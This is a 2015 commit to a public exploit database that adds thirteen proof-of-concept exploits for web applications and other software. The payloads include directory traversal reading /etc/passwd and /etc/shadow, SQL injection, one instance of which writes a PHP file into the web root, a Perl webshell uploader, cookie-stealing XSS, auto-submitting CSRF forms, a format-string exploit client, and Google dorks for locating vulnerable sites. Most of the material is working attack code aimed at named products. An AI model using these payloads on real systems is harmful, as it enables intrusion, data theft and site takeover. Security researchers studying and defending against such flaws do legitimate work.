DB: 2015-10-24

13 new exploits
This commit is contained in:
Offensive Security 2015-10-24 05:03:12 +00:00
parent b4832cb23e
commit e75323a0d9
14 changed files with 477 additions and 0 deletions

View file

@ -34789,3 +34789,16 @@ id,file,description,date,author,platform,type,port
38511,platforms/php/webapps/38511.txt,"Gallery Server Pro Arbitrary File Upload Vulnerability",2013-05-14,"Drew Calcott",php,webapps,0
38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0
38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0
38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability",2013-05-15,ByEge,php,webapps,0
38516,platforms/php/webapps/38516.txt,"Open Flash Chart 'get-data' Parameter Cross-Site Scripting Vulnerability",2013-05-14,"Deepankar Arora",php,webapps,0
38517,platforms/php/webapps/38517.html,"WordPress Mail On Update Plugin Cross Site Request Forgery Vulnerability",2013-05-16,"Henri Salo",php,webapps,0
38518,platforms/php/webapps/38518.txt,"Jojo CMS 'search' Parameter Cross Site Scripting Vulnerability",2013-05-15,"High-Tech Bridge SA",php,webapps,0
38519,platforms/php/webapps/38519.txt,"Jojo CMS 'X-Forwarded-For' HTTP header SQL-Injection Vulnerability",2013-05-15,"High-Tech Bridge SA",php,webapps,0
38520,platforms/php/webapps/38520.html,"WordPress WP Cleanfix Plugin Cross Site Request Forgery Vulnerability",2013-05-16,"Enigma Ideas",php,webapps,0
38521,platforms/multiple/remote/38521.c,"Python RRDtool Module Function Format String Vulnerability",2013-05-18,"Thomas Pollet",multiple,remote,0
38522,platforms/linux/remote/38522.txt,"Acme thttpd HTTP Server Directory Traversal Vulnerability",2013-05-19,Metropolis,linux,remote,0
38523,platforms/php/webapps/38523.txt,"Weyal CMS Multiple SQL Injection Vulnerabilities",2013-05-23,XroGuE,php,webapps,0
38524,platforms/php/webapps/38524.pl,"Matterdaddy Market Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0
38525,platforms/php/webapps/38525.txt,"Subrion 3.X.X - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0
38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/60010/info
thttpd is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the web server. Information harvested may aid in launching further attacks.
www.example.com/../../../../../../../../etc/passwd
www.example.com/../../../../../../../../etc/shadow

139
platforms/multiple/remote/38521.c Executable file
View file

@ -0,0 +1,139 @@
source: http://www.securityfocus.com/bid/60004/info
The RRDtool module for Python is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input.
An attacker may exploit this issue to execute arbitrary code within the context of the affected application or to crash the application.
RRDtool 1.4.7 is affected; other versions may also be vulnerable.
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <string.h>
#define DFLTHOST "www.example.com"
#define DFLTPORT 5501
#define MAXMSG 256
#define fgfsclose close
void init_sockaddr(struct sockaddr_in *name, const char *hostname, unsigned port);
int fgfswrite(int sock, char *msg, ...);
const char *fgfsread(int sock, int wait);
void fgfsflush(int sock);
int fgfswrite(int sock, char *msg, ...)
{
va_list va;
ssize_t len;
char buf[MAXMSG];
va_start(va, msg);
vsnprintf(buf, MAXMSG - 2, msg, va);
va_end(va);
printf("SEND: \t<%s>\n", buf);
strcat(buf, "\015\012");
len = write(sock, buf, strlen(buf));
if (len < 0) {
perror("fgfswrite");
exit(EXIT_FAILURE);
}
return len;
}
const char *fgfsread(int sock, int timeout)
{
static char buf[MAXMSG];
char *p;
fd_set ready;
struct timeval tv;
ssize_t len;
FD_ZERO(&ready);
FD_SET(sock, &ready);
tv.tv_sec = timeout;
tv.tv_usec = 0;
if (!select(32, &ready, 0, 0, &tv))
return NULL;
len = read(sock, buf, MAXMSG - 1);
if (len < 0) {
perror("fgfsread");
exit(EXIT_FAILURE);
}
if (len == 0)
return NULL;
for (p = &buf[len - 1]; p >= buf; p--)
if (*p != '\015' && *p != '\012')
break;
*++p = '\0';
return strlen(buf) ? buf : NULL;
}
void fgfsflush(int sock)
{
const char *p;
while ((p = fgfsread(sock, 0)) != NULL) {
printf("IGNORE: \t<%s>\n", p);
}
}
int fgfsconnect(const char *hostname, const int port)
{
struct sockaddr_in serv_addr;
struct hostent *hostinfo;
int sock;
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0) {
perror("fgfsconnect/socket");
return -1;
}
hostinfo = gethostbyname(hostname);
if (hostinfo == NULL) {
fprintf(stderr, "fgfsconnect: unknown host: \"%s\"\n", hostname);
close(sock);
return -2;
}
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(port);
serv_addr.sin_addr = *(struct in_addr *)hostinfo->h_addr;
if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
perror("fgfsconnect/connect");
close(sock);
return -3;
}
return sock;
}
int main(int argc, char **argv)
{
int sock;
unsigned port;
const char *hostname, *p;
int i;
hostname = argc > 1 ? argv[1] : DFLTHOST;
port = argc > 2 ? atoi(argv[2]) : DFLTPORT;
sock = fgfsconnect(hostname, port);
if (sock < 0)
return EXIT_FAILURE;
fgfswrite(sock, "data");
fgfswrite(sock, "set /sim/rendering/clouds3d-enable true");
fgfswrite(sock, "set /environment/clouds");
for (i=0; i < 5; i++) {
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cu/cloud/name %%n", i);
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cb/cloud/name %%n", i);
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ac/cloud/name %%n", i);
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/st/cloud/name %%n", i);
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ns/cloud/name %%n", i);
}
p = fgfsread(sock, 3);
if (p != NULL)
printf("READ: \t<%s>\n", p);
for (i=0; i < 5; i++) {
fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage scattered", i);
fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage cirrus", i);
fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage clear", i);
}
p = fgfsread(sock, 3);
if (p != NULL)
printf("READ: \t<%s>\n", p);
fgfswrite(sock, "quit");
fgfsclose(sock);
return EXIT_SUCCESS;
}

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59886/info
The wp-FileManager plugin for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks.
http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59928/info
Open Flash Chart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://ww.example.com/joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()

View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/59932/info
The Mail On Update plugin for WordPress is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
Mail On Update 5.1.0 is vulnerable; prior versions may also be affected.
<html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update"; method="post"
class="buttom-primary">
<input name="mailonupdate_mailto" type="hidden" value="example0 () example com
example1 () example com
example2 () example com
example3 () example com
example4 () example com
example5 () example com
example6 () example com
example7 () example com
example8 () example com
example9 () example com
example10 () example com
henri+monkey () nerv fi" />
<input name="submit" type="submit" value="Save"/></form></html>

12
platforms/php/webapps/38518.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/59933/info
Jojo CMS is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Jojo CMS 1.2 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/forgot-password/" method="post">
<input type="hidden" name="search" value='<script>alert(document.cookike);</script>'>
<input type="submit" id="btn">
</form>

13
platforms/php/webapps/38519.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/59934/info
Jojo CMS is prone to an SQL-injection vulnerability because it fails to sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Jojo CMS 1.2 is vulnerable; other versions may also be affected.
POST /articles/test/ HTTP/1.1
X-Forwarded-For: ' OR 1=1 INTO OUTFILE '/var/www/file.php' --
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
name=name&email=user%40mail.com&website=&anchortext=&comment=comment&submit=Post+Comment

View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/59940/info
The WP cleanfix plugin for WordPress is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
WP cleanfix 2.4.4 is vulnerable; other versions may also be affected.
SRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://www.example.com/wordpress/wordpress-351/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpCleanFixAjax" />
<input type="hidden" name="command" value="echo&#32;phpversion&#40;&#41;&#59;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

11
platforms/php/webapps/38523.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/60089/info
Weyal CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6
http://www.example.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14
http://www.example.com/countrys.php?countryid=-999 union all select 1,version(),database()

52
platforms/php/webapps/38524.pl Executable file
View file

@ -0,0 +1,52 @@
source: http://www.securityfocus.com/bid/60150/info
Matterdaddy Market is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Matterdaddy Market 1.4.2 is vulnerable; other version may also be affected.
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
|====================================================|
|= Matterdaddy Market 1.4.2 File Uploader Fuzzer |
|= >> Provided By KedAns-Dz << |
|= e-mail : ked-h[at]hotmail.com |
|====================================================|
INTRO
print "\n";
print "[!] Enter URL(f.e: http://target.com): ";
chomp(my $url=<STDIN>);
print "\n";
print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php;.gif)
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/controller.php?op=newItem',
Content_Type => 'multipart/form-data',
Content =>
[
'md_title' => '1337day',
'md_description' => 'Inj3ct0r Exploit Database',
'md_price' => '0',
'md_email2' => 'kedans@pene-test.dz', # put u'r email here !
'city' => 'Hassi Messaoud',
'namer' => 'KedAns-Dz',
'category' => '4',
'filetoupload' => $file,
'filename' => 'k3dsh3ll.php;.jpg',
# to make this exploit as sqli change file name to :
# k3dsh3ll' [+ SQLi +].php.jpg
# use temperdata better ;)
] );
print "\n";
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
else { print "[!] Check your email and confirm u'r post! \n"; }
} else { print "[-] HTTP request Failed!\n"; }
exit;

52
platforms/php/webapps/38525.txt Executable file
View file

@ -0,0 +1,52 @@
{-} Title => Subrion 3.X.X - Multiple Exploits
{-} Author => bRpsd (skype: vegnox)
{-} Date Release => 23 October, 2015
{-} Vendor => Subrion
Homepage => http://www.subrion.org/
Download => http://tools.subrion.org/get/latest.zip
Vulnerable Versions => 3.X.X
Tested Version => Latest, 3.3.5 on a Wamp Server.
{x} Google Dork:: 1 => "© 2015 Powered by Subrion CMS"
{x} Google Dork:: 2 => "Powered by Subrion CMS"
--------------------------------------------------------------------------------------------------------------------------------
The installation folder never get deleted or protected unless you deleted it yourself.
Which let any unauthorized user access the installation panel and ruin your website in just a few steps ..
--------------------------------------------------------------------------------------------------------------------------------
#######################################################################################
Vulnerability #1 : Reset Administrator Password & Database settings
Risk: High
File Path: http://localhost/cms/install/install/configuration/
#######################################################################################
#######################################################################################
Vulnerability #2 : Arbitrary File Download + Full Path Disclouser
Risk: Medium
File Path: http://localhost/cms/install/install/download/
Method: POST
Parameter (for file contents) : config_content
#######################################################################################
#######################################################################################
Vulnerability #3 : Unauthorized Arbitrary Plugins Installer
Risk: Medium
File Path: http://localhost/cms/install/install/plugins/
#######################################################################################
** SOLUTION ** ! :
Solution for all vulnerabilities is to delete the file located at:
/install/modules/module.install.php
H@PPY H@CK1NG !

47
platforms/php/webapps/38527.txt Executable file
View file

@ -0,0 +1,47 @@
Realtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities
Vendor: Realtyna LLC
Product web page: https://www.realtyna.com
Affected version: 8.9.2
Summary: Realtyna CRM (Client Relationship Management) Add-on
for RPL is a Real Estate CRM specially designed and developed
based on business process and models required by Real Estate
Agents/Brokers. Realtyna CRM intends to increase the Conversion
Ratio of the website Visitors to Leads and then Leads to Clients.
Desc: Realtyna RPL suffers from multiple SQL Injection vulnerabilities.
Input passed via multiple POST parameters is not properly sanitised
before being returned to the user or used in SQL queries. This can
be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Tested on: Apache
PHP/5.4.38
MySQL/5.5.42-cll
Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
Advisory ID: ZSL-2015-5272
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5272.php
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog
CVE ID: CVE-2015-7714
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7714
05.10.2015
--
http://localhost/administrator/index.php
POST parameters: id, copy_field, pshow, css, tip, cat_id, text_search, plisting, pwizard
Payloads:
- option=com_rpl&view=addon_membership_members&format=edit&id=84'
- option=com_rpl&view=property_structure&format=ajax&function=new_field&id=3004'&type=text
- option=com_rpl&view=rpl_multilingual&format=ajax&function=data_copy&copy_field=308'&copy_from=&copy_to=en_gb&copy_method=1
- option=com_rpl&view=property_structure&format=ajax&function=update_field&id=3002&options=0&css=&tip=&style=&name=&cat_id=1&text_search=0&plisting=0&pshow=1'&pwizard=1&mode=add

74
platforms/php/webapps/38528.txt Executable file
View file

@ -0,0 +1,74 @@
Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities
Vendor: Realtyna LLC
Product web page: https://www.realtyna.com
Affected version: 8.9.2
Summary: Realtyna CRM (Client Relationship Management) Add-on
for RPL is a Real Estate CRM specially designed and developed
based on business process and models required by Real Estate
Agents/Brokers. Realtyna CRM intends to increase the Conversion
Ratio of the website Visitors to Leads and then Leads to Clients.
Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site. Multiple cross-site scripting vulnerabilities
were also discovered. The issue is triggered when input passed
via the multiple parameters is not properly sanitized before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in
context of an affected site.
Tested on: Apache
PHP/5.4.38
MySQL/5.5.42-cll
Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
Advisory ID: ZSL-2015-5271
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog
CVE ID: CVE-2015-7715
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715
05.10.2015
--
1. CSRF:
<html lang="en">
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://localhost/administrator/index.php" id="formid" method="post">
<input type="hidden" name="option" value="com_rpl" />
<input type="hidden" name="view" value="addon_membership_members" />
<input type="hidden" name="format" value="ajax" />
<input type="hidden" name="function" value="add_user" />
<input type="hidden" name="id" value="85" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
2. Cross Site Scripting (Stored):
http://localhost/administrator/index.php
POST parameters: new_location_en_gb, new_location_fr_fr
Payloads:
option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location
option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location